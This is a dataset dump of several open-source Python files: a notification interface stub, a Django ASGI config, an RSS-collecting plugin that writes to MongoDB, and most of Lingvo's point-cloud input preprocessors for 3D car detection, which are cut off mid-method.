] | permissive | automatron/automatron-notify | 8c14ee5d8025ebefc7e9b7788e5414230c269676 | 4dcacfb3a56a51a7d1a7521f2ab9f7a895493f1a | refs/heads/master | 2021-01-17T14:31:31.323071 | 2014-03-25T08:18:46 | 2014-03-25T08:18:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 259 | py | from automatron.core.event import IAutomatronEventHandler
class IAutomatronNotifyHandler(IAutomatronEventHandler):
    # NOTE(review): this appears to be a zope.interface-style declaration --
    # interface methods deliberately omit ``self``. Confirm against
    # IAutomatronEventHandler before "fixing" the signature.
    def on_notify(server, username, title, body, body_as_html=None):
        """
        Called when a notification is triggered.

        :param server: originating server/context of the notification
        :param username: user to be notified
        :param title: short notification title
        :param body: plain-text notification body
        :param body_as_html: optional HTML rendering of ``body``
        """
| [
"[email protected]"
] | |
321adce537d7842bc56ed5889f848d7433663330 | 4b8d6d0c057049beabdc7a516bd0653af94894a6 | /DRF_nextjs/asgi.py | c3274d19c1591f6d6331af69cbe01c1a6e03c5b4 | [] | no_license | felipefoc/DRF-Next.Js | 71a4d35cd2f69ffe84fb76b37a7094cc2950a71f | f8a904ec17d21e88590719ba98202d9fbcccf11e | refs/heads/main | 2023-03-14T18:51:55.521287 | 2021-03-22T04:15:32 | 2021-03-22T04:15:32 | 350,203,864 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | """
ASGI config for DRF_nextjs project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
# Select the settings module before the application object is constructed.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'DRF_nextjs.settings')

# Module-level ASGI callable picked up by ASGI servers (uvicorn, daphne, ...).
application = get_asgi_application()
| [
"[email protected]"
] | |
141c85f367df5664a2789b37bc7d83c97dc4a197 | b5a29700c3516cf12f837e2284e3844546205d09 | /plugins/vipread_generic_plugin.py | 2771bd40386bf812df6f131de4bd2ab09fe0bf1a | [] | no_license | p1g3/Collect-Info-Research | f609823486f36460186cfde27f4be7c9c5a058ae | e8e7366677a8642c3bcf4b103e43378762e6673c | refs/heads/master | 2020-12-24T03:59:01.190032 | 2020-01-31T06:47:35 | 2020-01-31T06:47:35 | 237,374,792 | 37 | 12 | null | null | null | null | UTF-8 | Python | false | false | 1,913 | py |
import asyncio
import feedparser
import ssl
import pymongo
from loguru import logger
import datetime
from dateutil import parser
class vipread_generic_plugin:
def __init__(self,loop,collection,lock):
ssl._create_default_https_context = ssl._create_unverified_context
self.headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'}
self.loop = loop
self.rss = 'http://vipread.com/feed'
self.collection = collection
self.type = 'generic'
self.lock = lock
async def return_result(self):
logger.info("{} is running.",self.__class__.__name__)
future = self.loop.run_in_executor(None,feedparser.parse,self.rss)
try:
parse_result = await asyncio.wait_for(future, 10, loop=self.loop)
except:
logger.warning("{} parse time out".format(self.rss))
return
if parse_result.has_key('entries'):
entries = parse_result['entries']
format_time = datetime.date.today()
for entrie in entries:
article_time = parser.parse(entrie['updated'])
if (article_time.year == format_time.year) and (article_time.month == format_time.month) and (article_time.day == format_time.day):
add_dict = {'type':self.type,'title':entrie['title'],'link':entrie['link'],'is_send':0}
try:
await self.lock
if self.collection.count_documents({'link':entrie['link']}) < 1:
self.collection.insert_one(add_dict)
logger.info('[Generic] {} {}'.format(entrie['title'],entrie['link']))
finally:
self.lock.release()
else:
logger.error('[Error Parse] {}',self.rss)
if __name__ == '__main__':
client = pymongo.MongoClient(host='localhost', port=27017)
db = client.info_collect
collection = db['infos']
lock = asyncio.Lock()
loop = asyncio.get_event_loop()
class_name = vipread_generic_plugin(loop,collection,lock)
loop.run_until_complete(class_name.return_result())
| [
"[email protected]"
] | |
80939f748aac5f3242ea0bc5610644cacf4f8ba9 | d31d744f62c09cb298022f42bcaf9de03ad9791c | /lingvo/lingvo/tasks/car/input_preprocessors.py | 5848311b990c04f1afc36ede62048283bad93104 | [
"Apache-2.0"
] | permissive | yuhuofei/TensorFlow-1 | b2085cb5c061aefe97e2e8f324b01d7d8e3f04a0 | 36eb6994d36674604973a06159e73187087f51c6 | refs/heads/master | 2023-02-22T13:57:28.886086 | 2021-01-26T14:18:18 | 2021-01-26T14:18:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 136,426 | py | # Lint as: python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Input preprocessors."""
from lingvo import compat as tf
from lingvo.core import base_layer
from lingvo.core import py_utils
from lingvo.core import schedule
from lingvo.tasks.car import car_lib
from lingvo.tasks.car import detection_3d_lib
from lingvo.tasks.car import geometry
from lingvo.tasks.car import ops
import numpy as np
# pylint:disable=g-direct-tensorflow-import
from tensorflow.python.ops import inplace_ops
# pylint:enable=g-direct-tensorflow-import
def _ConsistentShuffle(tensors, seed):
"""Shuffle multiple tensors with the same shuffle order."""
shuffled_idx = tf.range(tf.shape(tensors[0])[0])
shuffled_idx = tf.random.shuffle(shuffled_idx, seed=seed)
return tuple([tf.gather(t, shuffled_idx) for t in tensors])
def _GetApplyPointMaskFn(points_mask):
"""Returns a function that applies a mask to one of our points tensors."""
def _ApplyPointMaskFn(points_tensor):
"""Applies a mask to the points tensor."""
if points_tensor is None:
return points_tensor
return tf.boolean_mask(points_tensor, points_mask)
return _ApplyPointMaskFn
def _Dense(sparse):
return tf.sparse_to_dense(
sparse_indices=sparse.indices,
output_shape=sparse.dense_shape,
sparse_values=sparse.values,
default_value=0)
class Preprocessor(base_layer.BaseLayer):
"""Base class for input preprocessor.
Input preprocessors expect the combined output of all extractors and performs
a transformation on them. Input preprocessors can add/edit/remove fields
from the NestedMap of features.
Note: Features correspond to that for one example (no batch dimension).
Sub-classes need to implement the following three functions:
1) TransformFeatures(features): Given a NestedMap of features representing the
output of all the extractors, apply a transformation on the features.
2) TransformShapes(shapes): Given a corresponding NestedMap of shapes,
produce a NestedMap of shapes that corresponds to the transformation of the
features after TransformFeatures.
3) TransformDTypes(dtypes): Given a corresponding NestedMap of dtypes,
produce a NestedMap of dtypes that corresponds to the transformation of the
features after TransformFeatures.
The preprocessor is expected to explicitly pass through untouched fields.
For example, a preprocessor that does data augmentation should modify the
features NestedMap on the fields it cares about augmenting, and then return
the features NestedMap.
"""
@classmethod
def Params(cls):
"""Default params."""
p = super().Params()
p.name = cls.__name__
return p
def FProp(self, theta, features):
"""Performs TransformFeatures."""
del theta # unused
return self.TransformFeatures(features)
def TransformFeatures(self, features):
"""Transforms the features for one example.
Args:
features: A `NestedMap` of tensors.
Returns:
A `NestedMap` of tensors corresponding.
"""
raise NotImplementedError()
def TransformShapes(self, shapes):
"""Sets correct shapes corresponding to TransformFeatures.
Args:
shapes: A `NestedMap` of TensorShapes, corresponding to the
pre-transformed features.
Returns:
A `NestedMap` of TensorShapes corresponding to the transformed features.
"""
raise NotImplementedError()
def TransformDTypes(self, dtypes):
"""Sets correct dtypes corresponding to TransformFeatures.
Args:
dtypes: A `NestedMap` of DTypes, corresponding to the pre-transformed
features.
Returns:
A `NestedMap` of DTypes corresponding to the transformed features.
"""
raise NotImplementedError()
class EntryPreprocessor(Preprocessor):
  """A Preprocessor that transforms a NestedMap sub-structure.

  Some preprocessors want to apply a function to any NestedMap whose key matches
  a specific prefix. An EntryPreprocessor provides an interface for specifying
  the function transformation for a NestedMap of inputs, adding, modifying, or
  deleting the entries in that NestedMap.

  For example, if an input contains a nested structure such as:
    - lasers.front.xyz
                  .features
    - lasers.side.xyz
                 .features

  and one wants to apply a transform that modifies the .xyz features
  on both structures, one can define an EntryPreprocessor that implements:

    UpdateEntry(entry):
    UpdateEntryShape(shapes):
    UpdateEntryDType(dtypes):

  and set self.params.prefixes = ['lasers.front', 'lasers.side']
  where the prefixes refer to a fully-qualified NestedMap sub-structure.

  The arguments to these functions will contain just the NestedMap structure
  whose key prefix can be found in self.params.prefixes. One can then modify
  these structures as desired.

  Example:
    def UpdateEntry(self, entry):
      # entry is a NestedMap.
      assert 'xyz' in entry
      entry.xyz = self._ApplyFn(entry.xyz)
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define('prefixes', ['pseudo_ri'], 'List of keys to apply to.')
    return p

  def _ApplyToMatchingStructure(self, nested_map, fn):
    """Apply fn to any NestedMap sub-structure whose prefix is in p.prefixes.

    Args:
      nested_map: A NestedMap; a deep copy is transformed, the original is
        left untouched.
      fn: A callable invoked (for its in-place side effects) on each
        sub-NestedMap selected by p.prefixes.

    Returns:
      A (transformed copy of nested_map, list of the updated sub-maps) tuple.

    Raises:
      TypeError: If any prefix selects something other than a NestedMap.
    """
    p = self.params
    # Don't mutate the original.
    nested_map = nested_map.DeepCopy()
    updated_entries = []
    for prefix in p.prefixes:
      entry = nested_map.GetItem(prefix)
      if not isinstance(entry, py_utils.NestedMap):
        raise TypeError('Prefix key {} selected a {}, not a NestedMap!'.format(
            prefix, type(entry)))
      # fn mutates `entry` in place; the entry is also collected for callers
      # interested in the updated sub-maps.
      fn(entry)
      updated_entries.append(entry)
    return nested_map, updated_entries

  def UpdateEntry(self, entry):
    """Update the Tensors in a NestedMap entry.

    Args:
      entry: A NestedMap of Tensors.
    """
    raise NotImplementedError()

  def UpdateEntryShape(self, shapes):
    """Update the shapes in a NestedMap entry.

    Args:
      shapes: A NestedMap of TensorShapes.
    """
    raise NotImplementedError()

  def UpdateEntryDType(self, dtypes):
    """Transform the dtypes in a NestedMap entry.

    Args:
      dtypes: A NestedMap of dtypes.
    """
    raise NotImplementedError()

  def TransformFeatures(self, features):
    features, _ = self._ApplyToMatchingStructure(features, self.UpdateEntry)
    return features

  def TransformShapes(self, shapes):
    shapes, _ = self._ApplyToMatchingStructure(shapes, self.UpdateEntryShape)
    return shapes

  def TransformDTypes(self, dtypes):
    dtypes, _ = self._ApplyToMatchingStructure(dtypes, self.UpdateEntryDType)
    return dtypes
class CreateDecoderCopy(Preprocessor):
  """Creates references to current lasers, images, and labels.

  This is useful if the data is further transformed.

  If desired, the keys that are copied can be customized by overriding the
  default keys param.

  This preprocessor expects features to optionally contain the following keys:
  - lasers - a NestedMap of tensors
  - images - a NestedMap of tensors
  - labels - a NestedMap of tensors

  Adds the following features (if the features existed):
  - decoder_copy.lasers - a copy of the lasers NestedMap
  - decoder_copy.images - a copy of the images NestedMap
  - decoder_copy.labels - a copy of the labels NestedMap

  The processor also by default pads the laser features; this can be disabled
  by setting the pad_lasers param to None.
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define('keys', ['lasers', 'labels', 'images'],
             'Keys to look for and copy if exists.')
    p.Define('parent_key', 'decoder_copy', 'The key to nest the copies under.')
    p.Define('pad_lasers', PadLaserFeatures.Params(),
             'Params for a layer that pads the laser features.')
    p.name = 'create_decoder_copy'
    return p

  def __init__(self, params):
    super().__init__(params)
    p = self.params
    if p.pad_lasers is not None:
      self.CreateChild('pad_lasers', p.pad_lasers)

  def _DeepCopyIfExists(self, keys, nested_map, parent_key):
    """Deep copy a specific key to a parent key if it exists."""
    for k in keys:
      if k not in nested_map:
        continue
      # Lazily create the parent NestedMap on first copied key.
      if parent_key not in nested_map:
        nested_map[parent_key] = py_utils.NestedMap()
      nested_map[parent_key][k] = nested_map[k].DeepCopy()
    return nested_map

  def _CopyThenPad(self, nested_map, pad_method_name):
    """Copies p.keys under p.parent_key and applies the named pad method."""
    p = self.params
    nested_map = self._DeepCopyIfExists(p.keys, nested_map, p.parent_key)
    if p.pad_lasers is not None:
      # Resolve the child layer's method lazily: the `pad_lasers` child only
      # exists when the param is set.
      pad_fn = getattr(self.pad_lasers, pad_method_name)
      nested_map[p.parent_key] = pad_fn(nested_map[p.parent_key])
    return nested_map

  def TransformFeatures(self, features):
    return self._CopyThenPad(features, 'TransformFeatures')

  def TransformShapes(self, shapes):
    return self._CopyThenPad(shapes, 'TransformShapes')

  def TransformDTypes(self, dtypes):
    return self._CopyThenPad(dtypes, 'TransformDTypes')
class FilterByKey(Preprocessor):
  """Filters features to keep only specified keys.

  This keeps only feature entries that are specified. This allows us to reduce
  the number of fields returned. For example, during training, one may not
  need the actual laser points if training with a pillars based model that
  has a preprocessor that already maps the points to grid.
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define(
        'keep_key_prefixes', [''], 'Prefixes of keys to keep. If this '
        'contains the empty string, then it will keep all the keys.')
    return p

  def _FilterFn(self, key, entry):
    """Returns True iff `key` starts with any configured prefix."""
    del entry  # unused
    # str.startswith accepts a tuple of alternatives; an empty prefix ('')
    # matches every key, and an empty prefix list keeps nothing.
    return key.startswith(tuple(self.params.keep_key_prefixes))

  def TransformFeatures(self, features):
    return features.FilterKeyVal(self._FilterFn)

  def TransformShapes(self, shapes):
    return shapes.FilterKeyVal(self._FilterFn)

  def TransformDTypes(self, dtypes):
    return dtypes.FilterKeyVal(self._FilterFn)
class FilterGroundTruthByNumPoints(Preprocessor):
  """Removes ground truth boxes with less than params.min_num_points points.

  This preprocessor expects features to contain the following keys::
    labels.labels of shape [..., L]
    labels.bboxes_3d of shape [..., L, 7]
    labels.bboxes_3d_mask of shape [..., L]
    labels.unfiltered_bboxes_3d_mask of shape [..., L]
    labels.bboxes_3d_num_points of shape [..., L].

  Modifies the bounding box data to turn off ground truth objects that don't
  meet the params.min_num_points point filter:

    labels.labels: Boxes with less than params.min_num_points have their label
    set to params.background_id (defaults to 0).

    labels.bboxes_3d_mask: Boxes with less than params.min_num_points are set
    to 0.
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define(
        'min_num_points', 1, 'The minimum number of points allowed before '
        'the associated ground truth box is turned off. Defaults to 1.')
    p.Define(
        'background_id', 0, 'The ID of the background class we set '
        'filtered boxes to. Defaults to 0.')
    return p

  def TransformFeatures(self, features):
    p = self.params
    labels = features.labels
    # A box survives iff it contains at least min_num_points laser points.
    keep = tf.greater_equal(labels.bboxes_3d_num_points, p.min_num_points)
    background_labels = p.background_id * tf.ones_like(labels.labels)
    labels.labels = tf.where(keep, labels.labels, background_labels)
    labels.bboxes_3d_mask *= tf.cast(keep, tf.float32)
    return features

  def TransformShapes(self, shapes):
    return shapes

  def TransformDTypes(self, dtypes):
    return dtypes
class FilterGroundTruthByDifficulty(Preprocessor):
  """Removes groundtruth boxes based on detection difficulty.

  This preprocessor expects features to contain the following keys::
    labels.single_frame_detection_difficulties of shape [..., L]
    labels.labels of shape [..., L]
    labels.bboxes_3d_mask of shape [..., L]
    labels.unfiltered_bboxes_3d_mask of shape [..., L]

  The preprocessor masks out the bboxes_3d_mask / labels based on whether
  single_frame_detection_difficulties is greater than p.difficulty_threshold.
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define(
        'background_id', 0, 'The ID of the background class we set '
        'filtered boxes to. Defaults to 0.')
    p.Define(
        'difficulty_threshold', 1,
        'Filter groundtruth bounding boxes whose detection difficulty is '
        'greater than `difficulty_threshold`')
    return p

  def TransformFeatures(self, features):
    p = self.params
    labels = features.labels
    # A box survives iff its difficulty does not exceed the threshold.
    keep = tf.less_equal(labels.single_frame_detection_difficulties,
                         p.difficulty_threshold)
    background_labels = p.background_id * tf.ones_like(labels.labels)
    labels.labels = tf.where(keep, labels.labels, background_labels)
    labels.bboxes_3d_mask *= tf.cast(keep, tf.float32)
    return features

  def TransformShapes(self, shapes):
    return shapes

  def TransformDTypes(self, dtypes):
    return dtypes
class CountNumberOfPointsInBoxes3D(Preprocessor):
  """Computes bboxes_3d_num_points.

  This preprocessor expects features to contain the following keys:
  - lasers.points_xyz of shape [P, 3]
  - labels.bboxes_3d of shape [L, 7]
  - labels.bboxes_3d_mask of shape [L]

  and optionally points_padding of shape [P] corresponding to the padding.
  if points_padding is None, then all points are considered valid.

  Adds the following features:
    labels.bboxes_3d_num_points: [L] - integer tensor containing the number of
      laser points for each corresponding bbox.
  """

  def TransformFeatures(self, features):
    points_xyz = features.lasers.points_xyz
    if 'points_padding' in features.lasers:
      # Padding of 1 marks an invalid point; invert to get the valid mask.
      valid_mask = 1 - features.lasers.points_padding
      points_xyz = tf.boolean_mask(points_xyz, valid_mask)

    # [P, L] membership matrix: whether point p lies inside box l.
    membership = tf.cast(
        geometry.IsWithinBBox3D(points_xyz, features.labels.bboxes_3d),
        tf.int32)
    per_box_counts = tf.reduce_sum(membership, axis=0)
    # Zero out counts for padded (invalid) boxes.
    per_box_counts *= tf.cast(features.labels.bboxes_3d_mask, tf.int32)
    features.labels.bboxes_3d_num_points = per_box_counts
    return features

  def TransformShapes(self, shapes):
    num_bboxes = shapes.labels.bboxes_3d[0]
    shapes.labels.bboxes_3d_num_points = tf.TensorShape([num_bboxes])
    return shapes

  def TransformDTypes(self, dtypes):
    dtypes.labels.bboxes_3d_num_points = tf.int32
    return dtypes
class AddPerPointLabels(Preprocessor):
  """Computes the class and bbox id of each point.

  This preprocessor expects features to contain the following keys:
  - lasers.points_xyz of shape [P, 3]
  - labels.bboxes_3d of shape [L, 7]
  - labels.labels of shape [L]

  This makes an assumption that each point is only in 1 box, which should
  almost always true in 3D. In cases where this is not true, the largest
  label integer and largest bbox_id will be assigned.

  NOTE: Be very careful that this is performed after any modifications
  to the semantic labels of each point in the pointcloud. Examples of this
  would be operators like GroundTruthAugmentation, or DropBoxesOutOfRange.

  Adds the following features:
    lasers.points_label: [P] - integer tensor containing the class id of each
      point.
    lasers.points_bbox_id: [P] - integer tensor containing box id of each
      point from 0 to num_bboxes, where an id of num_bboxes indicates a
      background point.
    lasers.points_bbox_3d: [P, 7] - float tensor containing bounding box of
      each point.
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define(
        'per_dimension_adjustment', None,
        'A list of len 3 of floats with the amount (in meters) to add to '
        'each dimension of the box before using it to select points. '
        'If enabled, this is designed to protect against overly tight box '
        'annotations that appear in KITTI.')
    return p

  def TransformFeatures(self, features):
    p = self.params
    points_xyz = features.lasers.points_xyz
    bboxes_3d = features.labels.bboxes_3d
    num_points, _ = py_utils.GetShape(points_xyz)
    num_bboxes, _ = py_utils.GetShape(bboxes_3d)

    if p.per_dimension_adjustment:
      if len(p.per_dimension_adjustment) != 3:
        raise ValueError(
            'param `per_dimension_adjustment` expected to be len 3.')
      # Only elements 3:6 of the 7-dof box are enlarged (the size dims, per
      # the param description); the first three and the last entry of each
      # box are left unchanged.
      dims_adjustment = tf.constant([0, 0, 0] + p.per_dimension_adjustment +
                                    [0])
      bboxes_3d = bboxes_3d + dims_adjustment

    # Find which points are in each box and what class each box is.
    points_in_bboxes_mask = geometry.IsWithinBBox3D(points_xyz, bboxes_3d)
    points_in_bboxes_mask = tf.cast(points_in_bboxes_mask, tf.int32)
    points_in_bboxes_mask = py_utils.HasShape(points_in_bboxes_mask,
                                              [num_points, num_bboxes])

    # points_in_bboxes_mask is a [num_points, num_bboxes] 0/1 tensor
    # indicating whether that point is in a given box.
    # Each point should only be in one box, so after broadcasting the label
    # across the binary mask, we do a reduce_max to get the max label id
    # for each point. Since each point only belongs to one box, it will be
    # the only non-zero (background) label in that box.
    # Note: We assume background to be class_id == 0
    points_label = tf.reduce_max(
        points_in_bboxes_mask * features.labels.labels, axis=1)
    points_bbox_id = tf.argmax(
        points_in_bboxes_mask, axis=1, output_type=tf.int32)
    # If the class is background, make its id == num_bboxes
    points_bbox_id = tf.where(points_label > 0, points_bbox_id,
                              tf.broadcast_to(num_bboxes, [num_points]))

    # For each point, get the bbox_3d data. An all-zero "dummy" box is
    # appended so background points (id == num_bboxes) gather a zero box
    # instead of indexing out of range.
    dummy_bbox = tf.constant([[0, 0, 0, 0, 0, 0, 0]], dtype=tf.float32)
    bboxes_3d = tf.concat([bboxes_3d, dummy_bbox], axis=0)
    points_bbox_3d = tf.gather(bboxes_3d, points_bbox_id)

    points_label = tf.reshape(points_label, [num_points])
    points_bbox_id = tf.reshape(points_bbox_id, [num_points])
    features.lasers.points_label = points_label
    features.lasers.points_bbox_id = points_bbox_id
    features.lasers.points_bbox_3d = points_bbox_3d
    return features

  def TransformShapes(self, shapes):
    num_points = shapes.lasers.points_xyz[0]
    shapes.lasers.points_label = tf.TensorShape([num_points])
    shapes.lasers.points_bbox_id = tf.TensorShape([num_points])
    shapes.lasers.points_bbox_3d = tf.TensorShape([num_points, 7])
    return shapes

  def TransformDTypes(self, dtypes):
    dtypes.lasers.points_label = tf.int32
    dtypes.lasers.points_bbox_id = tf.int32
    dtypes.lasers.points_bbox_3d = tf.float32
    return dtypes
class PointsToGrid(Preprocessor):
  """Bins points to a 3D-grid using custom op: ops.point_to_grid.

  Expects features to have keys:
  - lasers.points_xyz of shape [P, 3]
  - lasers.points_feature of shape [P, num_laser_features]

  and optionally points_padding of shape [P] corresponding to the padding.
  if points_padding is None, then all points are considered valid.

  If normalizing the labels is enabled, then also expects:
  - labels.weights
  - labels.bboxes_td
  - labels.bboxes_td_mask
  - labels.bboxes_3d_mask

  Let:
    gx, gy, gz = p.grid_size
    F = 3 + num_laser_features

  Adds the following features:
    grid_centers: [gx, gy, gz, 3]: For each grid cell, the (x,y,z)
      floating point coordinate of its center.
    grid_num_points: [gx, gy, gz]: The number of points in each grid
      cell (integer).
    laser_grid: [gx, gy, gz, num_points_per_cell, F] - A 5D floating
      point Tensor containing the laser data placed into a fixed grid.

  Modifies the bboxes in labels to also be within the grid range x/y by default.
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define('num_points_per_cell', 100,
             'The maximum number of points per cell.')
    p.Define('grid_size', (40, 40, 1), 'Grid size along x,y,z axis.')

    # The max range of x and y is [-80, 80].
    p.Define('grid_range_x', (-80, 80), 'The X-axis Range covered by the grid')
    p.Define('grid_range_y', (-80, 80), 'The Y-axis Range covered by the grid')
    p.Define('grid_range_z', (-2, 4), 'The Z-axis Range covered by the grid')

    p.Define('normalize_td_labels', True,
             'Whether to clip the labels to the grid limits.')
    return p

  def _NormalizeLabels(self, ymin, xmin, ymax, xmax, x_range, y_range):
    """Normalizes the bboxes within a given range.

    Args:
      ymin: Tensor of box minimum y coordinates.
      xmin: Tensor of box minimum x coordinates.
      ymax: Tensor of box maximum y coordinates.
      xmax: Tensor of box maximum x coordinates.
      x_range: Two-element sequence (min_x, max_x) to normalize against.
      y_range: Two-element sequence (min_y, max_y) to normalize against.

    Returns:
      A (ymin, xmin, ymax, xmax) tuple rescaled so that the given ranges map
      to [0, 1]. NOTE(review): despite the "clip" wording in the param help,
      the coordinates are rescaled, not clipped.
    """
    assert x_range, 'Must specify x_range if clipping.'
    assert y_range, 'Must specify y_range if clipping.'
    assert len(x_range) == 2, 'x_range %s must be 2 elements.' % x_range
    assert len(y_range) == 2, 'y_range %s must be 2 elements.' % y_range

    x_range_min = x_range[0]
    x_range_len = x_range[1] - x_range[0]
    y_range_min = y_range[0]
    y_range_len = y_range[1] - y_range[0]
    xmin = tf.cast(xmin - x_range_min, tf.float32) / tf.cast(
        x_range_len, tf.float32)
    xmax = tf.cast(xmax - x_range_min, tf.float32) / tf.cast(
        x_range_len, tf.float32)
    ymin = tf.cast(ymin - y_range_min, tf.float32) / tf.cast(
        y_range_len, tf.float32)
    ymax = tf.cast(ymax - y_range_min, tf.float32) / tf.cast(
        y_range_len, tf.float32)

    return ymin, xmin, ymax, xmax

  def TransformFeatures(self, features):
    p = self.params

    points_xyz = features.lasers.points_xyz
    points_feature = features.lasers.points_feature
    if ('points_padding' in features.lasers and
        features.lasers.points_padding is not None):
      # Drop padded points before binning so they don't pollute the grid.
      points_mask = 1 - features.lasers.points_padding
      points_xyz = tf.boolean_mask(points_xyz, points_mask)
      points_feature = tf.boolean_mask(points_feature, points_mask)

    # [P, 3 + num_laser_features]: xyz concatenated with per-point features.
    points_full = tf.concat([points_xyz, points_feature], axis=-1)
    points_grid_full, grid_centers, num_points = ops.point_to_grid(
        points_full, p.num_points_per_cell, p.grid_size[0], p.grid_size[1],
        p.grid_size[2], p.grid_range_x, p.grid_range_y, p.grid_range_z)

    features.laser_grid = points_grid_full
    features.grid_centers = grid_centers
    features.grid_num_points = num_points

    if p.normalize_td_labels:
      # Normalize bboxes_td w.r.t grid range.
      obb = features.labels
      x_range = p.grid_range_x
      y_range = p.grid_range_y
      ymin, xmin, ymax, xmax = tf.unstack(obb.bboxes_td[..., :4], axis=-1)
      ymin, xmin, ymax, xmax = self._NormalizeLabels(
          ymin, xmin, ymax, xmax, x_range=x_range, y_range=y_range)
      # Reassemble, keeping any trailing box attributes beyond the first four
      # coordinates unchanged.
      obb.bboxes_td = tf.concat(
          [tf.stack([ymin, xmin, ymax, xmax], axis=-1), obb.bboxes_td[..., 4:]],
          axis=-1)

    return features

  def TransformShapes(self, shapes):
    p = self.params
    shapes.grid_centers = tf.TensorShape(list(p.grid_size) + [3])
    shapes.grid_num_points = tf.TensorShape(list(p.grid_size))
    shapes.laser_grid = tf.TensorShape(
        list(p.grid_size) +
        [p.num_points_per_cell, 3 + shapes.lasers.points_feature[-1]])
    return shapes

  def TransformDTypes(self, dtypes):
    dtypes.grid_centers = tf.float32
    dtypes.grid_num_points = tf.int32
    dtypes.laser_grid = tf.float32
    return dtypes
class _PointPillarGridSettings:
  """Settings for PointPillars model defined in paper.

  https://arxiv.org/abs/1812.05784
  """
  # Chooses grid sizes that are a multiple of 16 to support point pillars
  # model requirements. These also happen to match the values
  # in the PointPillars paper (voxel width of 0.16m in x, y)
  GRID_X = 432
  GRID_Y = 496
  GRID_Z = 1

  # Metric ranges covered by the grid; these fields are set in the subclasses.
  GRID_X_RANGE = None
  GRID_Y_RANGE = None
  GRID_Z_RANGE = None

  @classmethod
  def UpdateGridParams(cls, grid_params):
    """Apply PointPillars settings to grid_params."""
    grid_params.grid_size = (cls.GRID_X, cls.GRID_Y, cls.GRID_Z)
    grid_params.grid_range_x = cls.GRID_X_RANGE
    grid_params.grid_range_y = cls.GRID_Y_RANGE
    grid_params.grid_range_z = cls.GRID_Z_RANGE

  @classmethod
  def UpdateAnchorGridParams(cls, anchor_params, output_stride=2):
    """Apply PointPillars settings to anchor_params."""
    # Set anchor settings to match grid settings.
    # Grid size for anchors is half the resolution (with the default
    # output_stride of 2) in x and y; z is unchanged.
    anchor_params.grid_size = (cls.GRID_X // output_stride,
                               cls.GRID_Y // output_stride, cls.GRID_Z)
    anchor_params.grid_range_x = cls.GRID_X_RANGE
    anchor_params.grid_range_y = cls.GRID_Y_RANGE
    # Grid along z axis should be pinned to 0.
    anchor_params.grid_range_z = (0, 0)
def MakeGridSettings(grid_x_range, grid_y_range, grid_z_range, grid_x, grid_y,
                     grid_z):
  """Returns configured class for PointPillar grid settings."""
  # Build the subclass dynamically; equivalent to a literal `class` statement
  # overriding the range and size class attributes.
  overrides = dict(
      GRID_X_RANGE=grid_x_range,
      GRID_Y_RANGE=grid_y_range,
      GRID_Z_RANGE=grid_z_range,
      GRID_X=grid_x,
      GRID_Y=grid_y,
      GRID_Z=grid_z)
  return type('GridSettings', (_PointPillarGridSettings,), overrides)
# PointPillars grid for the car model: forward-facing x range, symmetric y
# range, single z slab, on a 432 x 496 x 1 cell grid.
PointPillarGridCarSettings = MakeGridSettings(
    grid_x_range=(0, 69.12),
    grid_y_range=(-39.68, 39.68),
    grid_z_range=(-3, 1),
    grid_x=432,
    grid_y=496,
    grid_z=1)

# Pedestrian/cyclist variant: roughly half the metric x/y extent of the car
# grid with a lower z band. NOTE(review): the cell counts (432 x 496) are
# unchanged from the car grid, which yields a finer effective resolution over
# the smaller range — confirm this is intended.
PointPillarGridPedCycSettings = MakeGridSettings(
    grid_x_range=(0, 47.36),
    grid_y_range=(-19.84, 19.84),
    grid_z_range=(-2.5, 0.5),
    grid_x=432,
    grid_y=496,
    grid_z=1)
class GridToPillars(Preprocessor):
  """Create pillars from a grid of points.

  Expects features to have keys:
    grid_centers: [gx, gy, gz, 3]

    grid_num_points: [gx, gy, gz]

    laser_grid: [gx, gy, gz, num_points_per_cell, F]

  Adds the following features:
    pillar_count: [] - scalar integer; the number of pillars actually
    selected (before padding to num_pillars).

    pillar_locations: [num_pillars, 3]. The grid location of each pillar.

    pillar_points: [num_pillars, num_points_per_cell, F]. Points of each
    pillar.

    pillar_centers: [num_pillars, 1, 3]. The grid-cell center of each pillar.

  Drops the following features by default:
    laser_grid
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define('num_points_per_cell', 100,
             'The maximum number of points per cell.')
    p.Define('num_pillars', 12000, 'The maximum number of pillars to produce.')
    p.Define('drop_laser_grid', True, 'Whether to drop the laser_grid feature.')
    # The density based sampler is more expensive.
    p.Define('use_density_sampler', False,
             'Use a density based sampler during pillar selection.')
    # NOTE(review): _DensitySample reads p.grid_size, which is not Defined
    # here — confirm grid_size is supplied to this layer's params before
    # enabling use_density_sampler.
    return p

  def _GumbelTransform(self, probs):
    """Adds gumbel noise to log probabilities for multinomial sampling.

    This enables fast sampling from a multinomial distribution without
    replacement. See https://arxiv.org/abs/1611.01144 for details.
    A colab that demonstrates this in practice is here:
    http://colab/drive/1iuMt2n_r7dKPQG9T0UVMuK3fkbBayKjd

    Args:
      probs: A 1-D float tensor containing probabilities, summing to 1.

    Returns:
      A 1-D float tensor of the same size of probs, with gumbel noise added to
